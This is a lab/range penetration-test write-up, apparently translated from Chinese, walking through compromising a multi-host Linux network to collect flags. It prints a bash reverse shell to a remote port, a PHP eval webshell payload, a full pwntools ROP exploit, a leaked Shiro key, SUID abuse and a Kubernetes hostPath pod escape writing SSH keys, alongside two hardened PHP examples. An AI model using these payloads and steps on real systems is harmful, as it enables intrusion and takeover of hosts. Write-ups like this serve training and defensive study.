

## Entry point - flag1

Information gathering:
```shell
❯ ./fscan -h 8.130.140.238
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-02 21:23:48] [INFO] 暴力破解线程数: 1
[2025-05-02 21:23:48] [INFO] 开始信息扫描
[2025-05-02 21:23:48] [INFO] 最终有效主机数量: 1
[2025-05-02 21:23:48] [INFO] 开始主机扫描
[2025-05-02 21:23:48] [INFO] 有效端口数量: 233
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:80
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:22
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:8080
[2025-05-02 21:23:48] [SUCCESS] 服务识别 8.130.140.238:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-05-02 21:23:53] [SUCCESS] 服务识别 8.130.140.238:80 => [http]
[2025-05-02 21:23:53] [SUCCESS] 服务识别 8.130.140.238:8080 => [http]
[2025-05-02 21:23:53] [INFO] 存活端口数量: 3
[2025-05-02 21:23:53] [INFO] 开始漏洞扫描
[2025-05-02 21:23:53] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-05-02 21:23:54] [SUCCESS] 网站标题 http://8.130.140.238 状态码:200 长度:10887 标题:""
[2025-05-02 21:23:54] [SUCCESS] 网站标题 http://8.130.140.238:8080 状态码:200 长度:1027 标题:Login Form
[2025-05-02 21:23:57] [SUCCESS] 目标: http://8.130.140.238:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-05-02 21:24:03] [SUCCESS] 扫描已完成: 5/5
```

Port 8080 runs a ThinkPHP version with a known nday; one run of the exploit tool takes it.

The vulnerability is detected, but the command-execution module returns no output, which suggests disable_functions is in effect, so upload a webshell directly instead.

Connect with AntSword; flag1 is in the root directory.

## First-level intranet

Write 1.sh through AntSword:

```shell
#!/bin/bash
bash -i >& /dev/tcp/ip/9000 0>&1
```

Catch the reverse shell.

Upload fscan and venom. AntSword's file upload failed here, so I started a Python web server on my VPS and fetched the files with wget.

Information gathering:
```shell
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0b:45:0a brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.17/16 brd 172.28.255.255 scope global dynamic eth0
       valid_lft 1892158377sec preferred_lft 1892158377sec
    inet6 fe80::216:3eff:fe0b:450a/64 scope link
       valid_lft forever preferred_lft forever
```

fscan 2.0 found nothing at all here; switching back to 1.8 worked normally.
```shell
./fscan -h 172.28.23.17/24
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.28.23.26 is alive
(icmp) Target 172.28.23.17 is alive
(icmp) Target 172.28.23.33 is alive
[*] Icmp alive hosts len is: 3
172.28.23.33:8080 open
172.28.23.17:8080 open
172.28.23.26:80 open
172.28.23.17:80 open
172.28.23.26:22 open
172.28.23.26:21 open
172.28.23.17:22 open
172.28.23.33:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.28.23.17 code:200 len:10887 title:""
[*] WebTitle http://172.28.23.17:8080 code:200 len:1027 title:Login Form
[*] WebTitle http://172.28.23.26 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=70998A514AB7010967A5EE44F499EBEB
[*] WebTitle http://172.28.23.33:8080/login;jsessionid=70998A514AB7010967A5EE44F499EBEB code:200 len:3860 title:智联科技 ERP 后台登陆
[+] PocScan http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2
```

The scan finds two assets, 172.28.23.26 and 172.28.23.33; .33 leaks a heapdump.
Setting up the proxy:

```shell
# on the local machine
./admin_macos_x64 -rhost 8.130.113.217 -rport 9999
# on the target
./agent_linux_x64 -lport 9999
```

## 172.28.23.33 - flag3

Request http://172.28.23.33:8080/actuator/heapdump to download the heapdump.

Analyse it with the tool:

```shell
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
```

That yields the Shiro key; write a webshell with a deserialization tool.

Couldn't find the flag; writeups online say this one is a pwn challenge, which is absurd.

Check the open ports:
```shell
(ops01:/) $ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 661/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* -
```

Use the exploit from https://www.dr0n.top/posts/f249db01/:
```python
from pwn import *
context.arch='amd64'
def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)
def show(key):
    p.sendlineafter(b'Option:',b'2')
    p.sendlineafter(b"Key: ",key)
def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)
def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
    0:username+0x10,
    0x10:[username+0x20,len(ukey),
          ukey,0],
    0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
    0:username+0x20,
    0x20:[username+0x30,len(ukey),
          ukey,0],
    0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
    rdi,username+0x50,
    rsi,0,
    rdx,0,0,
    rax,0x3b,
    syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
```
## 172.28.23.26 - flag2

```plaintext
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
```

The scan found anonymous FTP login on host .26.

Connect over FTP, grab the OA system's source code and audit it.

Starting from main.php, we find it includes checklogin.php:
```php
<?php
function islogin(){
    if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){
        if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){
            return true;
        }
        else {
            return false;
        }
    }
    else {
        return false;
    }
}
?>
```

As long as every one of those cookie values is non-empty, the request is treated as logged in.
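For contrast, here is a session-based replacement for that check. It is an added example, not the OA system's own code: identity and role fields live in the server-side session, which the client cannot forge, and the login path verifies a password hash. The PDO connection `$db`, the `users` table and its `password_hash` column are assumptions.

```php
<?php
// Added example: session-based replacement for checklogin.php's islogin(); not the OA system's code.
// Assumptions: a PDO connection $db and a users table with a bcrypt password_hash column.
declare(strict_types=1);

session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// Assumed helper: returns the user row or null when the login name is unknown.
function find_user(PDO $db, string $loginname): ?array
{
    $st = $db->prepare('SELECT id, loginname, password_hash, jueseid, danweiid, quanxian FROM users WHERE loginname = ?');
    $st->execute([$loginname]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Called by the login form: the password is checked against the stored hash, then the
// identity and role fields are copied into the server-side session (never into cookies).
function login(PDO $db, string $loginname, string $password): bool
{
    $user = find_user($db, $loginname);
    // Verify against a freshly made dummy hash when the user is unknown, so a missing
    // account does not return measurably faster than a wrong password.
    $hash = $user['password_hash'] ?? password_hash('not-a-real-password', PASSWORD_DEFAULT);
    $ok = password_verify($password, $hash);
    if ($user === null || !$ok) {
        return false;
    }
    session_regenerate_id(true);   // fresh session id on privilege change (anti-fixation)
    $_SESSION['user'] = [
        'id'        => (int) $user['id'],
        'loginname' => $user['loginname'],
        'jueseid'   => $user['jueseid'],
        'danweiid'  => $user['danweiid'],
        'quanxian'  => $user['quanxian'],
    ];
    return true;
}

// Drop-in replacement for islogin(): only the server-side session decides.
function islogin(): bool
{
    return isset($_SESSION['user']['id']);
}

// Authorization reads the role from the session, never from a client-controlled cookie.
function has_quanxian(string $needed): bool
{
    return islogin() && (string) $_SESSION['user']['quanxian'] === $needed;
}
```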

After logging in, look at the other features; the key one is the file upload, uploadbase64.php:
```php
<?php
/**
 * Description: PhpStorm.
 * Author: yoby
 * DateTime: 2018/12/4 18:01
 * Email:[email protected]
 * Copyright Yoby, all rights reserved
 */
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = ".".$result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
```
A quick AI-assisted read of it: the file content and the extension are both attacker-controlled (the extension is taken straight from the MIME subtype in the data URI), and the resulting path is returned to the caller 😂

So just upload a webshell in the format it expects, `<?php @eval($_GET[1]); ?>`:

```php
data:image/php;base64, PD9waHAgQGV2YWwoJF9HRVRbMV0pOyA/Pg==
```
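As an added example (not the OA system's code), this is how uploadbase64.php could validate the same input so that the extension comes from an allow-list rather than the client's MIME subtype, the decoded bytes are checked against their magic bytes with finfo, and the file gets a random server-chosen name. It assumes an `upload/` directory that the web server serves without executing scripts.

```php
<?php
// Added example: a hardened replacement for uploadbase64.php, not the OA system's own code.
// Assumes ./upload/ exists and the web server never executes scripts placed in it.
declare(strict_types=1);

const ALLOWED_MIME = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];
const MAX_BYTES = 2 * 1024 * 1024;

// Returns the stored file name, or null when the input is rejected.
function save_base64_image(string $dataUri, string $dir): ?string
{
    // Only a strictly formed data URI whose subtype is on the allow-list is accepted.
    // The extension is derived from the allow-list key, never from client-supplied text.
    if (!preg_match('#^data:image/(png|jpe?g|gif);base64,([A-Za-z0-9+/]+={0,2})$#', $dataUri, $m)) {
        return null;
    }
    $ext = strtolower($m[1]) === 'jpeg' ? 'jpg' : strtolower($m[1]);
    $bytes = base64_decode($m[2], true);   // strict mode: stray characters make it fail
    if ($bytes === false || strlen($bytes) === 0 || strlen($bytes) > MAX_BYTES) {
        return null;
    }
    // The declared type must match what the bytes really are (magic bytes via finfo),
    // so a PHP script labelled image/png is rejected here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->buffer($bytes) !== ALLOWED_MIME[$ext]) {
        return null;
    }
    // Server-chosen random name; nothing from the request influences the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = rtrim($dir, '/') . '/' . $name;
    if (file_put_contents($path, $bytes, LOCK_EX) === false) {
        return null;
    }
    return $name;
}

$saved = save_base64_image($_POST['imgbase64'] ?? '', __DIR__ . '/upload');
header('Content-Type: application/json');
if ($saved === null) {
    http_response_code(400);
    echo json_encode(['error' => 'invalid image']);
    exit;
}
echo json_encode(['src' => 'upload/' . $saved]);
```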

A pile of functions is disabled; bypass that with the AntSword plugin.

For some inexplicable reason the POST-based shell would not execute here; following other people's approach, modify .antproxy.php and write a second, GET-based shell as 1.php.

That executes successfully.

The flag is in the root directory.

SUID privilege escalation:

```shell
find / -type f -perm -04000 -ls 2>/dev/null
# /usr/bin/base32
```

base32 is SUID, so use it to read the flag.


## Second-level intranet

Host .26 has two network interfaces:

```shell
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0b:9b:70 brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.26/16 brd 172.28.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe0b:9b70/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:0b:9b:45 brd ff:ff:ff:ff:ff:ff
    inet 172.22.14.6/16 brd 172.22.255.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe0b:9b45/64 scope link
       valid_lft forever preferred_lft forever
```

Start a Python web server on the entry host and transfer fscan and venom to host .26:

```shell
python3 -m http.server 9000
wget http://172.28.23.17:9000/agent_linux_x64
```

Set up the proxy and use venom's built-in shell for the next stage:

```shell
chmod +777 agent*
./agent_linux_x64 -rhost 172.28.23.17 -rport 9998
```
```shell
./fscan -h 172.22.14.6/24
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.14.37 is alive
(icmp) Target 172.22.14.6 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 3
172.22.14.46:80 open
172.22.14.6:80 open
172.22.14.6:22 open
172.22.14.37:22 open
172.22.14.6:21 open
172.22.14.37:10250 open
172.22.14.37:2379 open
172.22.14.46:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.22.14.46 code:200 len:785 title:Harbor
[*] WebTitle http://172.22.14.6 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] InfoScan http://172.22.14.46 [Harbor]
[*] WebTitle https://172.22.14.37:10250 code:404 len:19 title:None
[+] ftp 172.22.14.6:21:anonymous
[->]OASystem.zip
[+] PocScan http://172.22.14.46/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]
```

Two more assets turn up: 172.22.14.46 and 172.22.14.37.

The /16 actually also holds a MySQL database, which we will find later.
## 172.22.14.46 - flag5

The host runs Harbor with an unauthenticated-access vulnerability; use the exploit from https://github.com/404tk/CVE-2022-46463


That yields flag05.

## 172.22.10.28 - flag6

Dump project/projectadmin:

```shell
python3 harbor.py http://172.22.14.46/ --dump project/projectadmin --v2
```

In that path we find the project's jar; audit it with any decompiler.

The database password is in the leaked configuration.

Use MDUT for UDF privilege escalation; the flag is in the root directory.

## 172.22.14.37 - flag4

Port 10250 is open on this host; that is the k8s kubelet service port, so scan the target k8s cluster for vulnerabilities:
```shell
❯ kube-hunter --remote 172.22.14.37
2025-05-03 01:56:11,112 INFO kube_hunter.modules.report.collector Started hunting
2025-05-03 01:56:11,112 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services
2025-05-03 01:56:12,902 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 172.22.14.37:10250
2025-05-03 01:56:15,266 INFO kube_hunter.modules.report.collector Found open service "Etcd" at 172.22.14.37:2379
2025-05-03 01:56:15,819 INFO kube_hunter.modules.report.collector Found open service "API Server" at 172.22.14.37:6443
2025-05-03 01:56:16,050 INFO kube_hunter.modules.report.collector Found vulnerability "K8s Version Disclosure" in 172.22.14.37:6443
2025-05-03 01:56:16,056 INFO kube_hunter.modules.report.collector Found vulnerability "Unauthenticated access to API" in 172.22.14.37:6443
2025-05-03 01:56:16,317 INFO kube_hunter.modules.report.collector Found vulnerability "Listing namespaces as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:16,573 INFO kube_hunter.modules.report.collector Found vulnerability "Listing roles as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:16,881 INFO kube_hunter.modules.report.collector Found vulnerability "Listing cluster roles as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:17,147 INFO kube_hunter.modules.report.collector Found vulnerability "Listing pods as anonymous user" in 172.22.14.37:6443
Nodes
+-------------+--------------+
| TYPE | LOCATION |
+-------------+--------------+
| Node/Master | 172.22.14.37 |
+-------------+--------------+
Detected Services
+-------------+--------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+-------------+--------------------+----------------------+
| Kubelet API | 172.22.14.37:10250 | The Kubelet is the |
| | | main component in |
| | | every Node, all pod |
| | | operations goes |
| | | through the kubelet |
+-------------+--------------------+----------------------+
| Etcd | 172.22.14.37:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current |
| | | state information, |
| | | and might contain |
| | | secrets |
+-------------+--------------------+----------------------+
| API Server | 172.22.14.37:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+-------------+--------------------+----------------------+
Vulnerabilities
For further information about a vulnerability, search its ID in:
https://avd.aquasec.com/
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| ID | LOCATION | MITRE CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV005 | 172.22.14.37:6443 | Initial Access // | Unauthenticated | The API Server port | b'{"kind":"APIVersio |
| | | Exposed sensitive | access to API | is accessible. | ns","versions":["v1" |
| | | interfaces | | Depending on your | ],"serverAddressByCl |
| | | | | RBAC settings this | ientCIDRs":[{"client |
| | | | | could expose access | CIDR":"0.0.0.0/0","s |
| | | | | to or control of | ... |
| | | | | your cluster. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | 172.22.14.37:6443 | Initial Access // | K8s Version | The kubernetes | v1.16.6-beta.0 |
| | | Exposed sensitive | Disclosure | version could be | |
| | | interfaces | | obtained from the | |
| | | | | /version endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing roles as | Accessing roles | ['kubeadm:bootstrap- |
| | | the K8S API Server | anonymous user | might give an | signer-clusterinfo', |
| | | | | attacker valuable | 'system:controller:b |
| | | | | information | ootstrap-signer', |
| | | | | | 'extension- |
| | | | | | apiserver-... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing pods as | Accessing pods might | [{'name': b'nginx-de |
| | | the K8S API Server | anonymous user | give an attacker | ployment-58d48b746d- |
| | | | | valuable information | q4zh7', 'namespace': |
| | | | | | b'default'}, |
| | | | | | {'name': |
| | | | | | b'coredns-5644d7b... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing namespaces | Accessing namespaces | ['default', 'kube- |
| | | the K8S API Server | as anonymous user | might give an | node-lease', 'kube- |
| | | | | attacker valuable | public', 'kube- |
| | | | | information | system'] |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing cluster | Accessing cluster | ['admin', 'cluster- |
| | | the K8S API Server | roles as anonymous | roles might give an | admin', 'edit', |
| | | | user | attacker valuable | 'flannel', |
| | | | | information | 'system:aggregate- |
| | | | | | to-admin', |
| | | | | | 'system:aggregate- |
| | | | | | to-edit... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
```

See 浅析K8S各种未授权攻击方法 (an overview of K8s unauthorized-access attack methods). Because the cluster's authorization is misconfigured, the system:anonymous user is bound to the cluster-admin role, so port 6443 lets anonymous users issue instructions to the cluster with administrator privileges.
Write an evil-deployment.yaml that creates a malicious pod mounting the host's / directory at /mnt inside the container; writing an SSH public key through that mount completes the escape.

evil-deployment.yaml:

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /
```

Deploy the pod:

```shell
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
Please enter Username: 1
Please enter Password:
deployment.apps/nginx-deployment configured
```

List all current pods:

```shell
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password:
NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-bgdhg 1/1 Running 0 34s
```

Exec into a bash shell in the pod:

```shell
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-bgdhg -- /bin/bash
Please enter Username: 1
Please enter Password:
root@nginx-deployment-864f8bfd6f-bgdhg:/# ls
```

Next, write the public key:

```shell
echo "你的公钥" > /mnt/root/.ssh/authorized_keys   # "你的公钥" = your public key
```

SSH into the target; port 3306 is open there, and the flag is in the database.

```shell
ssh -i id_ed25519 [email protected]
```
## Summary

Ranges made up entirely of Linux machines are rare, and reproducing this one went fairly smoothly.

The proxy dropping every few dozen minutes was hard to bear, though; a lot of time went into reconfiguring it, something that never happened in other environments.